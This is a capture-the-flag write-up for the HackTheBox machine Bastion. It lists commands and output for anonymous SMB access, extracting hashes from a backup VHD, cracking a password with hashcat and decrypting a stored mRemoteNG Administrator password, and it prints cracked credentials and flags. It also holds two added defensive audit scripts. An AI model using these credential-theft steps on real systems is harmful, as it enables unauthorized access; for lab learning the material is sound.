HackTheBox Bastion

Writeup for HackTheBox Bastion

Machine Synopsis

Bastion is an Easy-level Windows box which contains a VHD (Virtual Hard Disk) image from which credentials can be extracted. After logging in, the software mRemoteNG is found to be installed, which stores passwords insecurely and from which credentials can be extracted. (Source)

Key exploitation techniques:

  • SMB share enumeration and VHD image retrieval
  • Offline hash extraction from VHD (SAM/SYSTEM/SECURITY hives)
  • NTLM hash cracking
  • SSH for initial user access
  • mRemoteNG password decryption from configuration file
  • SSH for Administrator access

Enumeration

❯ nmap -sC -sV -A 10.10.10.134

PORT    STATE SERVICE      VERSION
22/tcp  open  ssh          OpenSSH for_Windows_7.9 (protocol 2.0)
| ssh-hostkey: 
|   2048 3a:56:ae:75:3c:78:0e:c8:56:4d:cb:1c:22:bf:45:8a (RSA)
|   256 cc:2e:56:ab:19:97:d5:bb:03:fb:82:cd:63:da:68:01 (ECDSA)
|_  256 93:5f:5d:aa:ca:9f:53:e7:f2:82:e6:64:a8:a3:a0:18 (ED25519)
135/tcp open  msrpc        Microsoft Windows RPC
139/tcp open  netbios-ssn  Microsoft Windows netbios-ssn
445/tcp open  microsoft-ds Windows Server 2016 Standard 14393 microsoft-ds

The scan identified SSH and SMB services on a Windows Server 2016 machine. smbclient was used to list accessible shares.

❯ smbclient -L \\\\10.10.10.134\\
Password for [WORKGROUP\shiro]: <no password>

    Sharename       Type      Comment
    ---------       ----      -------
    ADMIN$          Disk      Remote Admin
    Backups         Disk
    C$              Disk      Default share
    IPC$            IPC       Remote IPC

The Backups share was accessible anonymously. Browsing its contents revealed a note.txt and a WindowsImageBackup directory containing VHD files.

❯ smbclient \\\\10.10.10.134\\Backups
smb: \> ls
  note.txt                       AR       116  Tue Apr 16 18:10:09 2019
  WindowsImageBackup             Dn         0  Fri Feb 22 20:44:02 2019

note.txt contained a hint about not transferring the entire backup file locally due to slow VPN.

❯ cat note.txt
Sysadmins: please don't transfer the entire backup file locally, the VPN to the subsidiary office is too slow.

The WindowsImageBackup directory contained a subdirectory (e.g., L4mpje-PC/Backup 2019-02-22 124351/) with VHD files (.vhd).

Exploitation

Offline Hash Extraction (L4mpje)

The SMB Backups share was mounted locally using cifs.

❯ sudo mkdir -p /mnt/smb
❯ sudo mount -t cifs //10.10.10.134/Backups /mnt/smb
Password for root@//10.10.10.134/Backups: <no password>

Listing the backup directory on the mounted share showed two VHD files alongside the backup's XML metadata; the VHD was later mounted at /mnt/vhd.

/mnt/smb/WindowsImageBackup/L4mpje-PC/Backup ❯ ls
9b9cfbc3-369e-11e9-a17c-806e6f6e6963.vhd
9b9cfbc4-369e-11e9-a17c-806e6f6e6963.vhd
BackupSpecs.xml
cd113385-65ff-4ea2-8ced-5630f6feca8f_AdditionalFilesc3b9f3c7-5e52-4d5e-8b20-19adc95a34c7.xml
cd113385-65ff-4ea2-8ced-5630f6feca8f_Components.xml
cd113385-65ff-4ea2-8ced-5630f6feca8f_RegistryExcludes.xml
cd113385-65ff-4ea2-8ced-5630f6feca8f_Writer4dc3bdd4-ab48-4d07-adb0-3bee2926fd7f.xml
cd113385-65ff-4ea2-8ced-5630f6feca8f_Writer542da469-d3e1-473c-9f4f-7847f01fc64f.xml
cd113385-65ff-4ea2-8ced-5630f6feca8f_Writera6ad56c2-b509-4e6c-bb19-49d8f43532f0.xml
cd113385-65ff-4ea2-8ced-5630f6feca8f_Writerafbab4a2-367d-4d15-a586-71dbb18f8485.xml
cd113385-65ff-4ea2-8ced-5630f6feca8f_Writerbe000cbe-11fe-4426-9c58-531aa6355fc4.xml
cd113385-65ff-4ea2-8ced-5630f6feca8f_Writercd3f2362-8bef-46c7-9181-d62844cdc0b2.xml
cd113385-65ff-4ea2-8ced-5630f6feca8f_Writere8132975-6f93-4464-a53e-1050253ae220.xml

libguestfs-tools was installed, and guestmount was used to mount the VHD file (9b9cfbc4-369e-11e9-a17c-806e6f6e6963.vhd) from the mounted SMB share.

❯ sudo apt install libguestfs-tools
❯ sudo mkdir -p /mnt/vhd
❯ sudo guestmount --add '/mnt/smb/WindowsImageBackup/L4mpje-PC/Backup 2019-02-22 124351/9b9cfbc4-369e-11e9-a17c-806e6f6e6963.vhd' --inspector --ro /mnt/vhd

The SAM, SYSTEM, and SECURITY registry hives were located in /mnt/vhd/Windows/System32/config.

❯ ls /mnt/vhd/Windows/System32/config
...
SAM
SECURITY
SYSTEM
...

impacket-secretsdump was used with these hives to dump local NTLM hashes.

❯ impacket-secretsdump -sam /mnt/vhd/Windows/System32/config/SAM -system /mnt/vhd/Windows/System32/config/SYSTEM -security /mnt/vhd/Windows/System32/config/SECURITY LOCAL
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies

[*] Target system bootKey: 0x8b56b2cb5033d8e2e289c26f8939a25f
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
L4mpje:1000:aad3b435b51404eeaad3b435b51404ee:26112010952d963c8dc4217daec986d9:::
...
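Once SAM and SYSTEM hives sit in a backup on an anonymously readable share, every local hash in them has to be treated as exposed. The following script is an added example (not part of the original writeup or of Impacket) that parses secretsdump's `user:rid:lmhash:nthash:::` lines and triages them for a defender: accounts whose NT hash is the hash of the empty string, accounts that still carry a real LM hash, and accounts whose hash is crackable offline and therefore needs rotation. The sample dump is constructed from the three lines shown above; the `[*]` status lines are skipped by the parser.

```python
import re
from dataclasses import dataclass
from typing import Dict, List

# NT hash of the empty string: what the SAM stores for an account whose password is blank.
EMPTY_NT_HASH = "31d6cfe0d16ae931b73c59d7e0c089c0"
# Placeholder LM hash written when no LM hash is stored (the usual case on modern Windows).
EMPTY_LM_HASH = "aad3b435b51404eeaad3b435b51404ee"

# secretsdump prints local SAM entries as  user:rid:lmhash:nthash:::
SAM_LINE = re.compile(
    r"^(?P<user>[^:]+):(?P<rid>\d+):(?P<lm>[0-9a-fA-F]{32}):(?P<nt>[0-9a-fA-F]{32}):::$"
)

# Constructed sample: the three SAM lines from the writeup plus the tool's status lines.
SAMPLE_DUMP = """\
[*] Target system bootKey: 0x8b56b2cb5033d8e2e289c26f8939a25f
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
L4mpje:1000:aad3b435b51404eeaad3b435b51404ee:26112010952d963c8dc4217daec986d9:::
[*] Cleaning up...
"""


@dataclass
class SamEntry:
    user: str
    rid: int
    lm_hash: str
    nt_hash: str

    @property
    def blank_password(self) -> bool:
        return self.nt_hash.lower() == EMPTY_NT_HASH

    @property
    def lm_hash_stored(self) -> bool:
        # A real LM hash means the password is also kept in the weak legacy LM format.
        return self.lm_hash.lower() != EMPTY_LM_HASH


def parse_secretsdump(text: str) -> List[SamEntry]:
    """Return the SAM entries found in secretsdump output, ignoring banner and status lines."""
    entries = []
    for line in text.splitlines():
        m = SAM_LINE.match(line.strip())
        if m:
            entries.append(SamEntry(m["user"], int(m["rid"]), m["lm"], m["nt"]))
    return entries


def audit_sam(text: str) -> Dict[str, List[str]]:
    """Triage a leaked hive dump: blank passwords, stored LM hashes, and hashes to rotate."""
    entries = parse_secretsdump(text)
    return {
        "blank_password": [e.user for e in entries if e.blank_password],
        "lm_hash_stored": [e.user for e in entries if e.lm_hash_stored],
        # Any real NT hash is crackable offline: rotate it and check for reuse elsewhere.
        "rotate": [e.user for e in entries if not e.blank_password],
    }


if __name__ == "__main__":
    for category, users in audit_sam(SAMPLE_DUMP).items():
        print(f"{category}: {', '.join(users) or '-'}")
```

On the sample, Administrator and Guest come back as blank-password entries and L4mpje as the one hash to rotate. A SAM line carries no enabled/disabled flag, so a blank NT hash on its own says only that no password is set for that account in the backed-up hive, not whether the account can log on.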

The NTLM hash for L4mpje (26112010952d963c8dc4217daec986d9) was extracted and cracked using hashcat (mode 1000) with rockyou.txt.

❯ hashcat -m 1000 '26112010952d963c8dc4217daec986d9' /usr/share/wordlists/rockyou.txt
...
26112010952d963c8dc4217daec986d9:bureaulampje

The password for L4mpje was bureaulampje. SSH access was gained using these credentials.

❯ ssh L4mpje@10.10.10.134

Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.
l4mpje@BASTION C:\Users\L4mpje>type Desktop\user.txt
b6230043379272f4b71f11740da4886e

The user.txt flag was retrieved.

Privilege Escalation

mRemoteNG Password Decryption (Administrator)

Enumeration of L4mpje’s AppData\Roaming directory revealed an mRemoteNG folder containing confCons.xml.

l4mpje@BASTION C:\Users\L4mpje\AppData\Roaming\mRemoteNG>dir
...
22-02-2019  14:03             6.316 confCons.xml
...

confCons.xml contained an encrypted password for the Administrator user.

l4mpje@BASTION C:\Users\L4mpje\AppData\Roaming\mRemoteNG>type confCons.xml
<?xml version="1.0" encoding="utf-8"?>
<mrng:Connections xmlns:mrng="http://mremoteng.org" ... Protected="ZSvKI7j224Gf/twXpaP5G2QFZMLr1iO1f5JKdtIKL6eUg+eWkL5tKO886au0ofFPW0oop8R8ddXKAx4KK7sAk6AA" ...>
<Node Name="DC" Type="Connection" ... Username="Administrator" ... Password="aEWNFV5uGcjUHF0uS17QTdT9kVqtKCPeoC0Nw5dmaPFjNQ2kt/zO5xDqE4HdVmHAowVRdC7emf7lWWA10dQKiw==" Hostname="127.0.0.1" Protocol="RDP" ... />
...
</mrng:Connections>

The encrypted password aEWNFV5uGcjUHF0uS17QTdT9kVqtKCPeoC0Nw5dmaPFjNQ2kt/zO5xDqE4HdVmHAowVRdC7emf7lWWA10dQKiw== was extracted and decrypted with the public tool mRemoteNG-Decrypt.
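Before a user's roaming profile ends up in a backup share, it is worth knowing which stored connections in confCons.xml carry a saved password at all. The script below is an added example (not the writeup's code and not part of mRemoteNG or mRemoteNG-Decrypt) that parses the file with the standard library, walks nested container nodes, and reports every connection with a stored password, flagging privileged usernames. The sample file is constructed from the structure shown above: the DC node reuses the page's attributes, while the "Servers" container and the web01 node are invented for illustration.

```python
import json
import xml.etree.ElementTree as ET
from typing import Dict

MRNG_NS = "{http://mremoteng.org}"
PRIVILEGED_USERNAMES = {"administrator", "admin", "root"}

# Constructed sample modelled on the confCons.xml shown in the writeup. The DC node is the
# page's; the "Servers" container and the web01 node below it are made up for this example.
SAMPLE_CONFCONS = """<?xml version="1.0" encoding="utf-8"?>
<mrng:Connections xmlns:mrng="http://mremoteng.org" Name="Connections"
    Protected="ZSvKI7j224Gf/twXpaP5G2QFZMLr1iO1f5JKdtIKL6eUg+eWkL5tKO886au0ofFPW0oop8R8ddXKAx4KK7sAk6AA">
  <Node Name="DC" Type="Connection" Username="Administrator"
        Password="aEWNFV5uGcjUHF0uS17QTdT9kVqtKCPeoC0Nw5dmaPFjNQ2kt/zO5xDqE4HdVmHAowVRdC7emf7lWWA10dQKiw=="
        Hostname="127.0.0.1" Protocol="RDP" />
  <Node Name="Servers" Type="Container">
    <Node Name="web01" Type="Connection" Username="deploy" Password=""
          Hostname="10.0.0.5" Protocol="SSH2" />
  </Node>
</mrng:Connections>
"""


def audit_confcons(xml_text: str) -> Dict:
    """Inventory stored credentials in an mRemoteNG connections file without decrypting them."""
    root = ET.fromstring(xml_text.encode("utf-8"))
    if root.tag != MRNG_NS + "Connections":
        raise ValueError(f"not an mRemoteNG connections file (root element is {root.tag})")
    report = {
        # The root carries a Protected value; its presence tells us the file is a
        # password-protected connections file, but not how strong that password is.
        "protected_attr_present": bool(root.get("Protected")),
        "stored_credentials": [],
        "no_stored_password": [],
    }
    # Node elements are not namespace-prefixed; iter() descends into Container nodes too.
    for node in root.iter("Node"):
        if node.get("Type") != "Connection":
            continue
        username = node.get("Username", "")
        entry = {
            "name": node.get("Name", ""),
            "username": username,
            "hostname": node.get("Hostname", ""),
            "protocol": node.get("Protocol", ""),
            "privileged": username.lower() in PRIVILEGED_USERNAMES,
        }
        # The ciphertext itself is never copied into the report, only the fact that it exists.
        if node.get("Password"):
            report["stored_credentials"].append(entry)
        else:
            report["no_stored_password"].append(entry)
    return report


if __name__ == "__main__":
    print(json.dumps(audit_confcons(SAMPLE_CONFCONS), indent=2))
```

Run against a real profile, the report gives the list of hosts whose saved credentials must be rotated if the file leaks, with the Administrator RDP entry standing out as the high-value one; the ciphertext is deliberately left out of the output so the report can be shared without spreading the secret further.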

❯ git clone https://github.com/haseebT/mRemoteNG-Decrypt
❯ cd mRemoteNG-Decrypt
❯ python3 mremoteng_decrypt.py -s 'aEWNFV5uGcjUHF0uS17QTdT9kVqtKCPeoC0Nw5dmaPFjNQ2kt/zO5xDqE4HdVmHAowVRdC7emf7lWWA10dQKiw=='
Password: thXLHM96BeKL0ER2

The decrypted password for Administrator was thXLHM96BeKL0ER2. SSH access was gained as Administrator.

❯ ssh Administrator@10.10.10.134

Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.
administrator@BASTION C:\Users\Administrator>type Desktop\root.txt
9afa7bdc0dae4a62bb28217bebe7053b

The root.txt flag was retrieved.

This post is licensed under CC BY 4.0 by the author.